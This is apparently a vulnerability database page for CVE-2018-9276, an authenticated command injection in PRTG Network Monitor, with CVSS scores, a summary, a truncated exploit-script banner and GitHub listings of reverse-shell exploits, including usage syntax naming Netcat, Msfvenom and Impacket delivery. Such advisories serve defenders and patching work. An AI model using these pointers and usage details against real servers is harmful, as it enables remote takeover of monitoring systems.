CVE-2018-9276

Published: 02/07/2018 Updated: 25/04/2023
CVSS v2 Base Score: 9 | Impact Score: 10 | Exploitability Score: 8
CVSS v3 Base Score: 7.2 | Impact Score: 5.9 | Exploitability Score: 1.2
VMScore: 906
Vector: AV:N/AC:L/Au:S/C:C/I:C/A:C

Vulnerability Summary

An issue exists in PRTG Network Monitor prior to 18.2.39. An attacker who has access to the PRTG System Administrator web console with administrative privileges can exploit an OS command injection vulnerability (both on the server and on devices) by sending malformed parameters in sensor or notification management scenarios.

Vulnerable Product

paessler prtg network monitor

Exploits

#!/bin/bash echo -e "\n\e[00;33m[+]#########################################################################[+] \e[00m" echo -e "\e[00;32m[*] Authenticated PRTG network Monitor remote code execution [*] \e[00m" echo -e "\e[00;33m[+]#########################################################################[+] \e[00m" echo -e "\e[00;32m ...
PRTG versions prior to 18.2.39 suffer from a command execution vulnerability ...
PRTG Network Monitor version 18.2.38 authenticated remote code execution exploit ...

Github Repositories

CVE-2018-9276 PRTG < 18.2.39 Reverse Shell (Python3 support)

CVE-2018-9276 Authenticated Command Injection. CVE-2018-9276 PRTG < 18.2.39 Reverse Shell (Python3 support). Dependencies: Impacket (python3 version), Netcat, Msfvenom. Usage: git clone github.com/A1vinSmith/CVE-2018-9276.git ./exploit.py -i targetIP -p targetPort --lhost hostIP --lport hostPort --user user --password pass The

CVE-2018-9276 PRTG < 18.2.39 Authenticated Command Injection (Reverse Shell)

CVE-2018-9276 PRTG < 18.2.39 Authenticated Command Injection (Reverse Shell). nvd.nist.gov/vuln/detail/CVE-2018-9276. Improved version of an exploit written by github.com/M4LV0. I used the POST data from their script but just made it more reliable, as I didn't have much success with it. Payload delivery is essentially smb_delivery. Impacket serves up a dll